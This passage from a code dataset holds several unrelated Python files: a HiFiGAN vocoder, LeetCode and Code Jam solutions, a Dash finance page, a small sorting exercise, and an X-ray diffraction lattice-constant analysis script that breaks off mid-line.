weight_norm(\n Conv1d(h.num_mels, h.upsample_initial_channel, 7, 1, padding=3)\n )\n resblock = ResBlock1 if h.resblock == \"1\" else ResBlock2\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n c_cur = h.upsample_initial_channel // (2 ** (i + 1))\n self.ups.append(\n weight_norm(\n ConvTranspose1d(\n h.upsample_initial_channel // (2**i),\n h.upsample_initial_channel // (2 ** (i + 1)),\n k,\n u,\n padding=(k - u) // 2,\n )\n )\n )\n if i + 1 < len(h.upsample_rates): #\n stride_f0 = int(np.prod(h.upsample_rates[i + 1 :]))\n self.noise_convs.append(\n Conv1d(\n 1,\n c_cur,\n kernel_size=stride_f0 * 2,\n stride=stride_f0,\n padding=stride_f0 // 2,\n )\n )\n else:\n self.noise_convs.append(Conv1d(1, c_cur, 
kernel_size=1))\n self.resblocks = nn.ModuleList()\n ch = h.upsample_initial_channel\n for i in range(len(self.ups)):\n ch //= 2\n for j, (k, d) in enumerate(\n zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)\n ):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n self.upp = int(np.prod(h.upsample_rates))\n\n def forward(self, x, f0):\n har_source = self.m_source(f0, self.upp).transpose(1, 2)\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n x_source = self.noise_convs[i](har_source)\n x = x + x_source\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i * self.num_kernels + j](x)\n else:\n xs += self.resblocks[i * self.num_kernels + j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print(\"Removing weight norm...\")\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)\n\n\ndef load_nsf_hifigan(model_dir: str):\n config_path = os.path.join(model_dir, \"config.json\")\n config = NsfHifiganConfig.parse_json(config_path)\n vocoder = Generator(config)\n state_dict = torch.load(os.path.join(model_dir, \"model\"))\n vocoder.load_state_dict(state_dict[\"generator\"])\n return vocoder, config\n\n\nclass Vocoder:\n def __init__(self, vocoder_type: str, vocoder_dir: str, device=None):\n if device is None:\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.device = device\n\n if vocoder_type == \"nsf-hifigan\":\n self.vocoder = NsfHifiGAN(vocoder_dir, device=device)\n elif vocoder_type == \"nsf-hifigan-log10\":\n self.vocoder = NsfHifiGANLog10(vocoder_dir, device=device)\n else:\n raise ValueError(f\" [x] Unknown vocoder: {vocoder_type}\")\n\n self.resample_kernel = {}\n self.vocoder_sample_rate = self.vocoder.sample_rate()\n self.vocoder_hop_size = self.vocoder.hop_size()\n self.dimension = self.vocoder.dimension()\n\n def extract(self, audio, sample_rate, keyshift=0):\n # resample\n if sample_rate == self.vocoder_sample_rate:\n audio_res = audio\n else:\n key_str = str(sample_rate)\n if key_str not in self.resample_kernel:\n self.resample_kernel[key_str] = Resample(\n sample_rate, self.vocoder_sample_rate, lowpass_filter_width=128\n ).to(self.device)\n audio_res = self.resample_kernel[key_str](audio)\n\n # extract\n mel = self.vocoder.extract(audio_res, keyshift=keyshift) # B, n_frames, bins\n return mel\n\n def infer(self, mel, f0):\n f0 = f0[:, : mel.size(1), 0] # B, n_frames\n audio = self.vocoder(mel, f0)\n return audio\n\n\nclass NsfHifiGAN(torch.nn.Module):\n def __init__(self, model_dir: str, device: torch.device):\n super().__init__()\n self.device = device\n self.model_dir = model_dir\n self.model, self.config = load_nsf_hifigan(model_dir)\n self.model = self.model.to(device)\n self.stft = STFT(\n self.config.sampling_rate,\n self.config.num_mels,\n self.config.n_fft,\n self.config.win_size,\n self.config.hop_size,\n self.config.fmin,\n self.config.fmax,\n )\n\n def sample_rate(self):\n return self.config.sampling_rate\n\n def hop_size(self):\n return self.config.hop_size\n\n def dimension(self):\n return self.config.num_mels\n\n def extract(self, audio, keyshift=0):\n mel = self.stft.get_mel(audio, 
keyshift=keyshift).transpose(\n 1, 2\n ) # B, n_frames, bins\n return mel\n\n def forward(self, mel, f0):\n with torch.no_grad():\n c = mel.transpose(1, 2)\n audio = self.model(c, f0)\n return audio\n\n\nclass NsfHifiGANLog10(NsfHifiGAN):\n def forward(self, mel, f0):\n with torch.no_grad():\n c = 0.434294 * mel.transpose(1, 2)\n audio = self.model(c, f0)\n return audio\n","repo_name":"ddPn08/Latopia","sub_path":"latopia/diffusion/vocoder.py","file_name":"vocoder.py","file_ext":"py","file_size_in_byte":15704,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"61"} +{"seq_id":"31137975480","text":"# In MATLAB, there is a very useful function called 'reshape', which can reshape\n# a matrix into a new one with different size but keep its original data.\n# \n#\n# \n# You're given a matrix represented by a two-dimensional array, and two positive\n# integers r and c representing the row number and column number of the wanted res\n# haped matrix, respectively.\n#\n# The reshaped matrix need to be filled with all the elements of the original ma\n# trix in the same row-traversing order as they were.\n# \n#\n# \n# If the 'reshape' operation with given parameters is possible and legal, output\n# the new reshaped matrix; Otherwise, output the original matrix.\n# \n#\n# Example 1: \n# \n# Input:\n# nums =\n# [[1,2],\n# [3,4]]\n# r = 1, c = 4\n# Output:\n# [[1,2,3,4]]\n# Explanation: The row-traversing of nums is [1,2,3,4]. The new reshaped matrix i\n# s a 1 * 4 matrix, fill it row by row by using the previous list.\n# \n# \n#\n# Example 2: \n# \n# Input:\n# nums =\n# [[1,2],\n# [3,4]]\n# r = 2, c = 4\n# Output:\n# [[1,2],\n# [3,4]]\n# Explanation: There is no way to reshape a 2 * 2 matrix to a 2 * 4 matrix. So ou\n# tput the original matrix.\n# \n# \n#\n# Note: \n# \n# The height and width of the given matrix is in range [1, 100]. \n# The given r and c are all positive. \n# \n# Related Topics Array\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def matrixReshape(self, nums: List[List[int]], r: int, c: int) -> List[List[int]]:\n m = len(nums[0])\n n = len(nums)\n if m * n != r * c:\n return nums\n result = [[0 for _ in range(c)] for _ in range(r)]\n for x in range(r):\n for y in range(c):\n col = (x * c + y) % m\n row = (x * c + y - col) // m\n result[x][y] = nums[row][col]\n return result\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"W-KE/Leetcode-Solutions","sub_path":"leetcode/editor/en/566.reshape-the-matrix.py","file_name":"566.reshape-the-matrix.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23559274511","text":"\nq=int(input())\nfor z in range(0,q):\n a=int(input())\n while 1:\n s=str(a)\n for i in range(0,len(s)-1):\n if s[i]>s[i+1]:\n a-=1\n break\n else:\n print(\"Case #\"+str(z+1)+\":\",a)\n break","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3667.py","file_name":"3667.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"533347957","text":"import dash\nfrom dash import html, dcc, callback, Input, Output\nimport dash_bootstrap_components as dbc\n\ndash.register_page(__name__, path='/rates')\n\n# the style arguments for the sidebar. 
We use position:fixed and a fixed width\nSIDEBAR_STYLE = {\n \"position\": \"fixed\",\n \"top\": \"56px\",\n \"left\": 0,\n \"bottom\": 0,\n \"width\": \"20rem\",\n \"padding\": \"1rem 1rem\",\n \"background-color\": \"#f8f9fa\",\n}\n\n# the styles for the main content position it to the right of the sidebar and\n# add some padding.\nCONTENT_STYLE = {\n \"margin-left\": \"22rem\",\n \"margin-right\": \"2rem\",\n \"padding\": \"2rem 1rem\",\n}\n\nfirst_date = '2000-01-01'\nlast_date = '2022-12-31'\n\ndate_input = html.Div(\n dcc.DatePickerSingle(\n id='date-picker-single',\n min_date_allowed=first_date,\n max_date_allowed=last_date,\n initial_visible_month=last_date,\n disabled_days=[],\n first_day_of_week=1,\n day_size=32,\n date=last_date,\n ),\n className='text-center mt-3'\n)\n \nrate_type_input = html.Div(\n [\n dbc.Select(\n [\n \"Par Rates\", \n \"Zero Curve\", \n \"Discount Curve\",\n \"Forward Curve\"\n ],\n \"Par Rates\",\n id=\"rate-type-select\",\n class_name='mt-3 mb-3'\n ),\n ]\n)\n\ntenors_input = html.Div(\n [\n dbc.Label(\"Tenors:\", class_name='mt-3'),\n dbc.Select(\n [\"Treasury\", \"Monthly\", \"Quarterly\", \"Yearly\"],\n \"Treasury\",\n id=\"tenor-select\",\n ),\n ]\n)\n\n\ninterpolation_type_input = html.Div(\n [\n dbc.Label(\"Interpolation method:\", class_name='mt-3'),\n dbc.Select(\n [\n \"Natural Cubic Spline\",\n \"Linear\"\n ],\n \"Natural Cubic Spline\",\n id=\"interpolation-type-select\",\n ),\n ]\n)\n\nperiod_input = html.Div(\n [\n dbc.Label(\"Historical period:\"),\n dbc.RadioItems(\n id=\"radios\",\n className=\"btn-group\",\n inputClassName=\"btn-check\",\n labelClassName=\"btn btn-outline-primary\",\n labelCheckedClassName=\"active\",\n options=[\n {\"label\": \"3m\", \"value\": '3m'},\n {\"label\": \"1y\", \"value\": '1y'},\n {\"label\": \"5y\", \"value\": '5y'},\n {\"label\": \"10y\", \"value\": '10y'},\n {\"label\": \"20y\", \"value\": '20y'},\n {\"label\": \"all\", \"value\": 'all'},\n ],\n value=1,\n ),\n html.Div(id=\"output\"),\n ],\n className=\"radio-group\",\n)\n\n\ntab1_content = html.Div(\n [\n date_input,\n tenors_input,\n interpolation_type_input,\n ]\n)\n\ntab2_content = html.Div(\n [\n period_input,\n html.P(\"todo: Checkboxes to select tenors like 3M, 2Y\", className=\"card-text\"),\n ],\n className=\"mt-3\"\n)\n\n\ntabs = dbc.Tabs(\n [\n dbc.Tab(tab1_content, label=\"PIT\"),\n dbc.Tab(tab2_content, label=\"Hist\"),\n ]\n)\n\nsidebar = html.Div(\n [\n html.H3(\"Treasury Rates\", className=\"display-6\"),\n rate_type_input,\n tabs,\n ],\n style=SIDEBAR_STYLE,\n)\n\ncontent = html.Div(id=\"page-content\", style=CONTENT_STYLE)\n\nlayout = html.Div([dcc.Location(id=\"url\"), sidebar, content])\n\n","repo_name":"atresearch/findash","sub_path":"src/pages/rates.py","file_name":"rates.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1245377504","text":"x=[1,3,5,2]\r\ny=[]\r\nxl = len(x)\r\nfor g in x[:]:\r\n max=0\r\n for i in x[:]:\r\n if i > max:\r\n max = i\r\n y.append(max)\r\n x.remove(max)\r\n\r\n\r\nprint(y)\r\nprint(x)","repo_name":"yvvvvvvvv/Scu_","sub_path":"Scu_Level1-1/ComputerScience/20211228/20211228_for.py","file_name":"20211228_for.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39117648093","text":"from scipy.optimize import curve_fit\nfrom scipy.signal import find_peaks\nfrom scipy.stats import sem\nfrom uncertainties 
import ufloat\nimport matplotlib.pyplot as plt\nfrom matplotlib import pylab\n\n'''\nImport millerindizes as miller from Auswertung/millerindizes.py with\nimportlib.util. Note that in the third line of this piece of code the\nname of the module is defined for further use in the code.\n'''\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\"millerindizes\", \"Auswertung/millerindizes.py\")\nmiller = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(miller)\n\nimport numpy as np\nimport pandas as pd\nplt.rcParams['figure.figsize'] = (10, 8)\nplt.rcParams['font.size'] = 18\n\n# Turn off pandas warnings... be careful\npd.options.mode.chained_assignment = None\n\n\ndef linear(x, m, n):\n\n '''\n x: array of floats, values for which the function has to be evaluated.\n m, n: floats, parameters for the function.\n\n Simple linear function.\n\n Returns function values y=f(x).\n '''\n\n return m * x + n\n\n\ndef find_best_fit(evaluate_value, test_array, i):\n\n '''\n evaluate_value: float, value for which the best fitting value for n\n has to be evaluated.\n test_array: array of floats, possible values for evaluate_value\n i: int, index of currently evaluated PeakAngle\n\n Function to find the best fitting value, therefore the value where the\n Euclidean distance between evaluate_value and the evaluated test_array\n value is minimal. In other words, it just gives the lowest possible\n n, because the function does not work like initially planned (due\n to a wrong implementation, to be honest). The reason it is not altered\n is simply because it works.\n\n Returns best fit and distance to evaluated value (residuum res)\n '''\n\n # Initially, there should be a multiplication instead of a division.\n # But shit hits the fan if it is altered that way.\n res = d[i] / np.abs(test_array - evaluate_value)\n best_fit = test_array[d[i] * np.abs(test_array - evaluate_value) ==\n d[i] * np.abs(test_array - evaluate_value).min()]\n best_res = res[d[i] * np.abs(test_array - evaluate_value) ==\n d[i] * np.abs(test_array - evaluate_value).min()]\n return best_fit[0], best_res[0]\n\n\ndef find_lattice_constants(d, lattice, max_value):\n\n '''\n d: array of floats, array of the interplanar lattice distances\n lattice: string, assumed lattice-type. Supported: bcc and fcc\n max_value: int, maximum value for h, k and l respectively\n\n Function to find the best fitting Miller indices (h, k, l) and compute the\n lattice-constant a.\n\n Returns best fitting n = sqrt(h**2 + k**2 + l**2) and the corresponding\n a for each n.\n '''\n\n # Compute possible Miller indices for given lattice and max_value\n if lattice == \"bcc\":\n h, k, l = miller.bcc(max_value)\n elif lattice == \"fcc\":\n h, k, l = miller.fcc(max_value)\n elif lattice == \"Dia\":\n h, k, l = miller.Dia(max_value)\n elif lattice == \"CsCl\":\n h, k, l = miller.CsCl(max_value)\n elif lattice == \"ZnS\":\n h, k, l = miller.ZnS(max_value)\n elif lattice == \"F\":\n h, k, l = miller.F(max_value)\n elif lattice == \"NaCl\":\n h, k, l = miller.NaCl(max_value)\n else:\n print(\"No supported lattice-type given\")\n return\n\n # Compute denominator of the lattice-constant formula\n n = np.sqrt(h**2 + k**2 + l**2)\n\n n = n[:len(d)]\n h = h[:len(d)]\n k = k[:len(d)]\n l = l[:len(d)]\n\n a = d * n\n return n, a\n\n\ndef find_hkl(lattice, n, max_value):\n\n '''\n lattice: string, assumed lattice-type. 
Supported: bcc and fcc\n n: float, sqrt(h**2 + k**2 + l**2)\n max_value: int, maximum value for h, k and l respectivly\n\n Funktion to find the corresponding millier indizes (h, k, l) to a n.\n\n Returns millerindizes.\n '''\n\n # Compute possible millerindizes for given lattice and max_value\n if lattice == \"bcc\":\n h, k, l = miller.bcc(max_value)\n elif lattice == \"fcc\":\n h, k, l = miller.fcc(max_value)\n elif lattice == \"Dia\":\n h, k, l = miller.Dia(max_value)\n elif lattice == \"CsCl\":\n h, k, l = miller.CsCl(max_value)\n elif lattice == \"ZnS\":\n h, k, l = miller.ZnS(max_value)\n elif lattice == \"F\":\n h, k, l = miller.F(max_value)\n elif lattice == \"NaCl\":\n h, k, l = miller.NaCl(max_value)\n else:\n print(\"No supported lattice-type given\")\n return\n\n # Compute denominator of latticeconstant formular\n n_lattice = np.sqrt(h**2 + k**2 + l**2)\n indizes = np.empty([1])\n\n # Compare given n to possible n\n for j in range(len(n)):\n for i in range(len(n_lattice)):\n if n[j] == n_lattice[i]:\n # Set found n to 0 to avoid multiple identification of\n # the same h, k, l-tuple\n n_lattice[i] = 0\n indizes = np.append(indizes, i)\n break\n\n indizes = np.delete(indizes, [0])\n print(indizes)\n indizes = indizes.astype('int')\n\n # Identify indizes\n mask = np.zeros(len(h), dtype=bool)\n mask[indizes] = True\n\n h = h[mask]\n k = k[mask]\n l = l[mask]\n\n return h, k, l\n\n\nif __name__ == '__main__':\n # Print a welcome text.\n print(\"Welcome pesant or creator, whatever holds true. If you are the \"\n \"author of these script, you can scip this lines. \"\n \"If not, you may find some muy bien importante informationes here: \"\n \"First of all, you will need to produce GreyValue \"\n \"Data for this script. \"\n \"We recommend the use of fiji (ImageJ), where the \"\n \"Analysis -> Plot Profile \"\n \"function gives yuo a GreyValue Plot whose data can \"\n \"be saved as .csv file. \"\n \"The best results are produced, if the films \"\n \"are scanned. It might be \"\n \"necessary to leave the scanner open and expose the film to light \"\n \"(e.g. like a flashlight). Second to that, you \"\n \"will need to adjust some \"\n \"lines in this script. They are marked with a blockcomment.\")\n print(\"------------------------------------------------------------------\")\n\n '''\n main-routine of the analysis. In here, data is beeing read in, peaks are\n computed and the latticeconstants are computed.\n For this, the functions above are called.\n '''\n # Metall-Probe\n # Import GreyValue Data. Keys: Pixel, GreyValue\n Metall = pd.read_csv(filepath_or_buffer=\"Auswertung/Bilder/Metall.csv\")\n Metall.name = \"Metall\"\n Salt = pd.read_csv(filepath_or_buffer=\"Auswertung/Bilder/Salz.csv\")\n Salt.name = \"Salt\"\n\n # Subtract underground\n Salt.GreyValue = -Salt.GreyValue\n Metall.GreyValue = -Metall.GreyValue\n\n '''\n Attention:\n In the following rows, it is indispensable to adjust the cut-of value\n inside the boolean statement of the mask to your needs.\n '''\n\n Salt.GreyValue[Salt.GreyValue < -175] = -175\n Metall.GreyValue[Metall.GreyValue < -18] = -18\n\n for idx, Probe in enumerate([Metall]):\n\n '''\n Attention:\n In the following rows, the summands 6 (this happens twice!)\n is used to correct for a black\n marker, placed inside the center of the punchholes of the film to\n simplify the selection of a alaysis-window in ImageJ .\n Since they were colored black, the could not be taken in account\n for the grayvalue messurement. 
To evoid an error through this, it\n is corrected by adding the thereby lost 6 pixels in the conversion.\n '''\n # Convert from Pixel to centimetre, distance mesuered to be 18 cm\n print(\"Just ignore this warning, it seems to be useless:\")\n Probe.Distance = Probe.Pixel * (18 / (len(Probe.Pixel) + 6))\n print(\"--------------------------------------------------------------\")\n\n print(Probe.name, \"probe\")\n\n # Find peaks\n ProbePeaks, props = find_peaks(x=Probe.GreyValue, prominence=2.5)\n\n # Use only dark peaks\n LightPeaks = ProbePeaks[props['prominences'] <= 10]\n # ProbePeaks = ProbePeaks[props['prominences'] > 10]\n\n GreyValuePeaks = np.array(Probe.GreyValue[ProbePeaks])\n GreyValueLightPeaks = np.array(Probe.GreyValue[LightPeaks])\n\n # correct for dual peaks due to k_alpha_1 and k_alpha_2\n Corr_peak = (ProbePeaks[0] + ProbePeaks[1]) / 2\n Corr_Grey_Value = (GreyValuePeaks[0] + GreyValuePeaks[1]) / 2\n\n ProbePeaks = np.delete(ProbePeaks, [0, 1])\n GreyValuePeaks = np.delete(GreyValuePeaks, [0, 1])\n\n ProbePeaks = np.insert(ProbePeaks, [0], Corr_peak)\n GreyValuePeaks = np.insert(GreyValuePeaks, [0], Corr_Grey_Value)\n\n # Get Distance from peaks\n ProbePeaks = ProbePeaks * (18 / (len(Probe.Pixel) + 6))\n LightPeaks = LightPeaks * (18 / (len(Probe.Pixel) + 6))\n\n # Plot peaks\n plt.figure()\n plt.plot(Probe.Distance, Probe.GreyValue, ls='--', color='blue',\n label=\"Grauwert\")\n plt.plot(ProbePeaks, GreyValuePeaks, color='black',\n ls='', marker='o', label=\"Erkannte Peaks\")\n # plt.plot(LightPeaks, GreyValueLightPeaks, color='grey',\n # ls='', marker='o', label=\"Erkannte, schwache Peaks\")\n plt.xlabel(r\"$r / \\mathrm{cm}$\")\n plt.ylabel('inverser Grauwert')\n plt.xlim(0, 18)\n plt.legend(loc=\"lower left\")\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" + Probe.name + \"_Peaks.pdf\")\n\n # Distance is equal to 180° -> 1cm equals 10°\n # Bragg: 2dsin(theta)=n*lambda\n # lambda = 1.54093A\n # Angles have to be reverted, cause they have to be mesured acording to\n # the MP-vector\n\n lam = 1.54093 * 10**(-10)\n R = 57.3 * 10**(-3)\n\n PeakAngle = ProbePeaks * 10\n '''\n Attention:\n We had to invert the film in the next rows.\n Check if you need to do this.\n '''\n PeakAngle = np.abs(180 - PeakAngle)\n PeakAngle = np.sort(PeakAngle)\n\n # convert the angles to interplanar distance according to braggs law\n d = lam / (2 * np.sin(0.5 * PeakAngle * np.pi / 180))\n\n print(\"bcc n=sqrt(h**2+k**2+l**2):\")\n bcc_n, bcc_a = find_lattice_constants(d, 'bcc', 7)\n print(bcc_n)\n print('bcc h, k, l:')\n bcc_h, bcc_k, bcc_l = find_hkl('bcc', bcc_n, 7)\n print(bcc_h, bcc_k, bcc_l)\n print(\"bcc a:\")\n print(bcc_a)\n print(\"fcc n=sqrt(h**2+k**2+l**2):\")\n fcc_n, fcc_a = find_lattice_constants(d, 'fcc', 7)\n print(fcc_n)\n print('fcc h, k, l:')\n fcc_h, fcc_k, fcc_l = find_hkl('fcc', fcc_n, 7)\n print(fcc_h, fcc_k, fcc_l)\n print(\"fcc a:\")\n print(fcc_a)\n print(\"Dia n=sqrt(h**2+k**2+l**2):\")\n Dia_n, Dia_a = find_lattice_constants(d, 'Dia', 7)\n print(Dia_n)\n print('Dia h, k, l:')\n Dia_h, Dia_k, Dia_l = find_hkl('Dia', Dia_n, 7)\n print(Dia_h, Dia_k, Dia_l)\n print(\"Dia a:\")\n print(Dia_a)\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_bcc_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n bcc_n**2,\n bcc_h,\n bcc_k,\n bcc_l,\n bcc_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_fcc_Tabelle.tex\",\n np.column_stack([\n 
PeakAngle,\n fcc_n**2,\n fcc_h,\n fcc_k,\n fcc_l,\n fcc_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_Dia_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n Dia_n**2,\n Dia_h,\n Dia_k,\n Dia_l,\n Dia_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n bcc_n**2,\n bcc_h,\n bcc_k,\n bcc_l,\n bcc_a * 10**(12),\n fcc_n**2,\n fcc_h,\n fcc_k,\n fcc_l,\n fcc_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n # Compute best_fit for a thrugh linear regression\n bcc_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, bcc_a)\n bcc_errors = np.sqrt(np.diag(cov))\n m_bcc = ufloat(bcc_params[0], bcc_errors[0])\n n_bcc = ufloat(bcc_params[1], bcc_errors[1])\n\n fcc_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, fcc_a)\n fcc_errors = np.sqrt(np.diag(cov))\n m_fcc = ufloat(fcc_params[0], fcc_errors[0])\n n_fcc = ufloat(fcc_params[1], fcc_errors[1])\n\n Dia_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, Dia_a)\n Dia_errors = np.sqrt(np.diag(cov))\n m_Dia = ufloat(Dia_params[0], Dia_errors[0])\n n_Dia = ufloat(Dia_params[1], Dia_errors[1])\n\n print(\"bcc best fit:\")\n print(\"m = \", m_bcc, \", n = \", n_bcc)\n print(\"fcc best fit:\")\n print(\"m = \", m_fcc, \", n = \", n_fcc)\n print(\"Dia best fit:\")\n print(\"m = \", m_Dia, \", n = \", n_Dia)\n\n x_range = np.linspace(0, 90, 1000)\n x_range = np.cos(x_range * np.pi / 180)**2\n\n # Plot peaks\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, fcc_a * 10**(12),\n marker='x', color='blue', ls='')\n plt.plot(x_range, linear(x_range, *fcc_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: fcc-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_fcc_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, bcc_a * 10**(12),\n marker='x', color='red', ls='')\n plt.plot(x_range, linear(x_range, *bcc_params) * 10**(12),\n ls='-', color='red', label='Hypothese: bcc-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_bcc_Ausgleichsrechnung.pdf\")\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, bcc_a * 10**(12),\n marker='x', color='red', ls='')\n plt.plot(x_range, linear(x_range, *bcc_params) * 10**(12),\n ls='-', color='red', label='Hypothese: bcc-Gitter')\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, fcc_a * 10**(12),\n marker='x', color='blue', ls='')\n plt.plot(x_range, linear(x_range, *fcc_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: fcc-Gitter')\n # plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, Dia_a * 10**(12),\n # marker='x', color='green', ls='')\n # plt.plot(x_range, linear(x_range, *Dia_params) * 10**(12),\n # ls='-', color='green', label='Hypothese: Dia-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n 
plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_Ausgleichsrechnung.pdf\")\n\nfor idx, Probe in enumerate([Salt]):\n\n '''\n Attention:\n In the following rows, the summands 6 (this happens twice!)\n is used to correct for a black\n marker, placed inside the center of the punchholes of the film to\n simplify the selection of a alaysis-window in ImageJ .\n Since they were colored black, the could not be taken in account\n for the grayvalue messurement. To evoid an error through this, it\n is corrected by adding the thereby lost 6 pixels in the conversion.\n '''\n # Convert from Pixel to centimetre, distance mesuered to be 18 cm\n print(\"Just ignore this warning, it seems to be useless:\")\n Probe.Distance = Probe.Pixel * (18 / (len(Probe.Pixel) + 6))\n print(\"--------------------------------------------------------------\")\n\n print(Probe.name, \"probe\")\n\n # Find peaks\n ProbePeaks, props = find_peaks(x=Probe.GreyValue, prominence=2.5)\n\n # Use only dark peaks\n LightPeaks = ProbePeaks[props['prominences'] <= 10]\n # ProbePeaks = ProbePeaks[props['prominences'] > 10]\n\n GreyValuePeaks = np.array(Probe.GreyValue[ProbePeaks])\n GreyValueLightPeaks = np.array(Probe.GreyValue[LightPeaks])\n\n # correct for dual peaks due to k_alpha_1 and k_alpha_2\n Corr_peak = (ProbePeaks[0] + ProbePeaks[1]) / 2\n Corr_Grey_Value = (GreyValuePeaks[0] + GreyValuePeaks[1]) / 2\n\n ProbePeaks = np.delete(ProbePeaks, [0, 1])\n GreyValuePeaks = np.delete(GreyValuePeaks, [0, 1])\n\n ProbePeaks = np.insert(ProbePeaks, [0], Corr_peak)\n GreyValuePeaks = np.insert(GreyValuePeaks, [0], Corr_Grey_Value)\n\n # Get Distance from peaks\n ProbePeaks = ProbePeaks * (18 / (len(Probe.Pixel) + 6))\n LightPeaks = LightPeaks * (18 / (len(Probe.Pixel) + 6))\n\n # GreyValuePeaks = GreyValuePeaks[:11]\n # ProbePeaks = ProbePeaks[:11]\n\n # Plot peaks\n plt.figure()\n plt.plot(Probe.Distance, Probe.GreyValue, ls='--', color='blue',\n label=\"Grauwert\")\n plt.plot(ProbePeaks, GreyValuePeaks, color='black',\n ls='', marker='o', label=\"Erkannte Peaks\")\n # plt.plot(LightPeaks, GreyValueLightPeaks, color='grey',\n # ls='', marker='o', label=\"Erkannte, schwache Peaks\")\n plt.xlabel(r\"$r / \\mathrm{cm}$\")\n plt.ylabel('inverser Grauwert')\n plt.xlim(0, 18)\n plt.legend(loc=\"lower left\")\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" + Probe.name + \"_Peaks.pdf\")\n\n # Distance is equal to 180° -> 1cm equals 10°\n # Bragg: 2dsin(theta)=n*lambda\n # lambda = 1.54093A\n # Angles have to be reverted, cause they have to be mesured acording to\n # the MP-vector\n\n lam = 1.54093 * 10**(-10)\n R = 57.3 * 10**(-3)\n\n PeakAngle = ProbePeaks * 10\n '''\n Attention:\n We had to invert the film in the next rows.\n Check if you need to do this.\n '''\n PeakAngle = np.abs(180 - PeakAngle)\n print(PeakAngle)\n PeakAngle = np.sort(PeakAngle)\n print(PeakAngle)\n\n # convert the angles to interplanar distance according to braggs law\n d = lam / (2 * np.sin(0.5 * PeakAngle * np.pi / 180))\n\n print(\"ZnS n=sqrt(h**2+k**2+l**2):\")\n ZnS_n, ZnS_a = find_lattice_constants(d, 'ZnS', 7)\n print(ZnS_n)\n print('ZnS h, k, l:')\n ZnS_h, ZnS_k, ZnS_l = 